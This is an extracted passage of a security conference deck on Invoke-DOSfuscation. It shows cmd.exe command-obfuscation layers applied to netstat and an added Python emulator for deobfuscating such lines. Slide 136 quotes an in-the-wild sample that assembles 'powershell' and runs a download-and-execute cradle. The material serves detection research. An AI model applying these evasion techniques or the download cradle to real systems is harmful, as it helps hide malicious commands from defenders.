• CMd/C"sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
109
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
Payload Obfuscation 1 of 4: Concatenation
![Page 110: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/110.jpg)
• CMd /C " sEt coM3= /ano&& SEt cOm2=stat&& seT CoM1=net&& caLl SeT fiNAl=%COm1%%cOm2%%coM3%&& cAlL %FinAl% "
110
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
Payload Obfuscation 1 of 4: Concatenation
![Page 111: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/111.jpg)
• ;,,CMd,; ,/C ", ;, ;sEt coM3= /ano&&,,,SEt cOm2=stat&&;;;seT CoM1=net&&,
;caLl,;,SeT fiNAl=%COm1%%cOm2%%coM3%&&; , ,cAlL, ;, ;%FinAl% "
111
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
Payload Obfuscation 1 of 4: Concatenation
![Page 112: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/112.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ;, ;s^Et ^ ^ co^M3=^^ /^^an^o&&,,,S^Et^ ^
^cO^m2=^s^^ta^^t&&;;;s^eT^ ^ C^oM1^=^n^^et&&, ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%&&; , ,c^AlL^, ;,^ ;%Fi^nAl^% "
112
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
Payload Obfuscation 1 of 4: Concatenation
![Page 113: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/113.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
113
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
Payload Obfuscation 1 of 4: Concatenation
![Page 114: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/114.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
114
CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^
^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^, ;,^
;%%Fi^nAl^%%) ) "
netstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 115: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/115.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
115
CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T
^ ^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^,
;,^ ;%%Fi^nAl^%%) ) "
ne""tstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 116: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/116.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
116
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 117: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/117.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
117
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
![Page 118: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/118.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
118
ne""tstat /ano
vs
n"e"tstat /ano
✘ If we have to pair double quotes, how can we unpair them in the final variable?
Payload Obfuscation 1 of 4: Concatenation
![Page 119: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/119.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
119
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
Payload Obfuscation 1 of 4: Concatenation
![Page 120: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/120.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
120
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
Payload Obfuscation 1 of 4: Concatenation
![Page 121: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/121.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^%) ) "
121
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
Payload Obfuscation 1 of 4: Concatenation
![Page 122: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/122.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^ %) ) "
122
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
Payload Obfuscation 1 of 4: Concatenation
![Page 123: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/123.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""= %) ) "
123
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
Payload Obfuscation 1 of 4: Concatenation
![Page 124: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/124.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
124
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
Payload Obfuscation 1 of 4: Concatenation
![Page 125: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/125.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
125
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
✘ ✘
Payload Obfuscation 1 of 4: Concatenation
![Page 126: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/126.jpg)
https://i.imgur.com/PD9klNV.jpg
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
126
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
![Page 127: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/127.jpg)
https://i.imgur.com/PD9klNV.jpg
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
127
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
![Page 128: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/128.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
128
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
![Page 129: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/129.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
129
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
![Page 130: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/130.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
130
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion
• /V:ON
• /V:O
• /V:
• /V
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
![Page 131: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/131.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
131
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion
• /V:ON
• /V:O
• /V:
• /V
• /VISTA
• /VM
• /V*
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
![Page 132: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/132.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
132
• Env var names can be:
Payload Obfuscation 1 of 4: Concatenation
![Page 133: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/133.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ --$#$--=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^!!#**#!!=^s^^ta^^t)&&(;(;;s^eT^ ^ ……...=^n""^^e""t) ) &&set ;;;;;;;;;=""&&, ((
;c^aLl,^;,S^e^T ^ ^ '''''''''''''''=^%……...%%!!#**#!!%^%--$#$--%))&&; (, ,(c^AlL^, ;,^
;%''''''''''''''':""=!;;;;;;;;;:~0,1!%) ) "
133
• Env var names can be:
1. Special characters
Payload Obfuscation 1 of 4: Concatenation
![Page 134: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/134.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ ' =^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^'
=^s^^ta^^t)&&(;(;;s^eT^ ^ ' =^n""^^e""t) ) &&set ' =""&&, (( ;c^aLl,^;,S^e^T ^ ^ '
=^%' %%' %^%' %))&&; (, ,(c^AlL^, ;,^ ;%' :""=!' :~0,1!%) ) "
134
• Env var names can be:
1. Special characters
2. Whitespace
Payload Obfuscation 1 of 4: Concatenation
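The layers shown from slide 105 through slide 134 (random case, inserted whitespace, commas and semicolons, escape carets, parentheses, `call set` concatenation, paired quotes unpaired through `:""=!quotes:~0,1!` under delayed expansion, and variable names made of special characters or whitespace) all resolve back to one command because cmd.exe applies a fixed sequence of parsing phases. The Python below is an added example written for this transcript, not code from the deck or from Invoke-DOSfuscation: a small emulator of those phases that an analyst can run over a captured command line to recover what reached execution. The sample inputs are constructed in the style of the slides (the deck's own lines are wrapped by the extraction, so they are not copied verbatim). Simplifications are stated in the comments: the parent environment is assumed empty, `%%` and `^&` escapes are not modelled, the `:old=new` replacement is case-sensitive, and whitespace around a parenthesised command is dropped.

```python
# Emulator for the cmd.exe parsing phases behind the concatenation layers
# (added example; not code from the deck or from Invoke-DOSfuscation).
import re

GROUPING = " \t,;()"   # delimiter and grouping noise that may surround a command
SET_RE = re.compile(r"^set\s+([^=]+)=(.*)$", re.I | re.S)
CALL_RE = re.compile(r"^call[\s,;=]+(.*)$", re.I | re.S)

def split_and_unescape(line, split=True):
    """Phase 2: drop escape carets (^x -> x, ^^ -> ^) outside double quotes and,
    when split is set, cut the line at every unescaped && outside quotes.
    Simplifications: a lone trailing ^ is dropped; ^& and %% are not modelled."""
    cmds, cur, in_quote, i = [], [], False, 0
    while i < len(line):
        c = line[i]
        if c == '"':
            in_quote = not in_quote
            cur.append(c)
        elif c == "^" and not in_quote:
            if i + 1 < len(line):
                cur.append(line[i + 1])
            i += 1
        elif split and not in_quote and line.startswith("&&", i):
            cmds.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(c)
        i += 1
    cmds.append("".join(cur))
    return cmds

def strip_carets(value):
    return split_and_unescape(value, split=False)[0]

def apply_modifier(value, mod):
    """The two %var:...% modifiers the slides rely on: ~start,len and old=new
    (the replacement is case-sensitive here; cmd's is case-insensitive)."""
    if mod.startswith("~"):
        parts = mod[1:].split(",")
        start = int(parts[0] or 0)
        if len(parts) > 1:
            length = int(parts[1])
            return value[start:start + length] if length >= 0 else value[start:length]
        return value[start:]
    if "=" in mod:
        old, new = mod.split("=", 1)
        return value.replace(old, new) if old else value
    return value

def expand(text, env, marker="%", post=None):
    """Expand marker-delimited references: %name%, %name:old=new%, %name:~s,l%
    (or the same with ! for delayed expansion). Undefined names stay as written,
    which is what cmd does on the command line, unlike inside a batch file."""
    out, i = [], 0
    while i < len(text):
        if text[i] == marker:
            j = text.find(marker, i + 1)
            if j > i + 1:
                name, _, mod = text[i + 1:j].partition(":")
                if name.lower() in env:
                    value = apply_modifier(env[name.lower()], mod)
                    out.append(post(value) if post else value)
                    i = j + 1
                    continue
        out.append(text[i])
        i += 1
    return "".join(out)

def emulate(line, env=None, delayed=False):
    """Run the text inside cmd [/V] /c "..." through the parsing phases and return
    (env, executed): the variables set and every non-SET command that reached
    execution, in order. Assumes an empty parent environment and drops whitespace
    around a parenthesised command (cmd would keep trailing spaces in a SET value)."""
    env = {k.lower(): v for k, v in (env or {}).items()}
    executed = []
    line = expand(line, env)                 # phase 1: %var% over the whole line, before any SET runs
    for raw in split_and_unescape(line):     # phase 2: carets and && splitting
        cmd = raw.strip(GROUPING)            # ( ) , ; and spaces around a grouped command
        if delayed:
            cmd = expand(cmd, env, "!")      # phase 5: !var! when cmd was started with /V
        m = CALL_RE.match(cmd)
        if m:                                # phase 6: CALL re-expands %var%; carets carried
            cmd = expand(m.group(1), env, "%", strip_carets)   # inside values are consumed now
        m = SET_RE.match(cmd)
        if m:
            env[m.group(1).lower()] = m.group(2)   # names keep their trailing spaces (slide 134)
        elif cmd:
            executed.append(cmd)
    return env, executed

def executable_name(command):
    """cmd resolves the program token with quote characters removed, which is why
    n"e"tstat and ne""tstat (slides 115-117) both run netstat."""
    tokens = command.split()
    return tokens[0].replace('"', "").lower() if tokens else ""

# Constructed samples in the style of slides 105 and 113-134 (the deck's own
# lines are wrapped by the extraction, so they are not copied verbatim).
SIMPLE = ("set com3= /ano&&set com2=stat&&set com1=net"
          "&&call set final=%com1%%com2%%com3%&&call %final%")
LAYERED = ('( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)'
           '&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ '
           'fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) ')

if __name__ == "__main__":
    for text, v in ((SIMPLE, False), (LAYERED, True)):
        env, ran = emulate(text, delayed=v)
        print(ran, "->", executable_name(ran[-1]))
```

Both samples resolve to netstat: the simple form directly, the layered form as `n"e"tstat /ano`, which is the unpaired-quote result the slides work towards. For detection logic the value to match is the output of `executable_name`, not the raw command line, since the raw string can be varied without limit while the resolved program token cannot.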
![Page 135: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/135.jpg)
135
https://i.imgflip.com/rjkyg.jpg
Payload Obfuscation 1 of 4: Concatenation
![Page 136: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/136.jpg)
• Concatenation examples in the wild (1/3):
136
..\..\..\..\Windows\System32\cmd.exe /c "set da=wersh&& set gg=ell&& set
c0=po&&" cmd /c %c0%%da%%gg% -nonI -eP bypass -c iEx ((n`eW-OBjECt
('n'+'Et.w'+'EbclIe'+'nT')).('do'+'wNlo'+'adst'+'ring').Invoke(('h'+$s4+'t'+'t'+$o8
+'ps://'+…
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 1/3)
![Page 137: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/137.jpg)
• Concatenation examples in the wild (2/3):
137
CmD wMic & %Co^m^S^p^Ec^% /V /c set
%binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set
%zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set
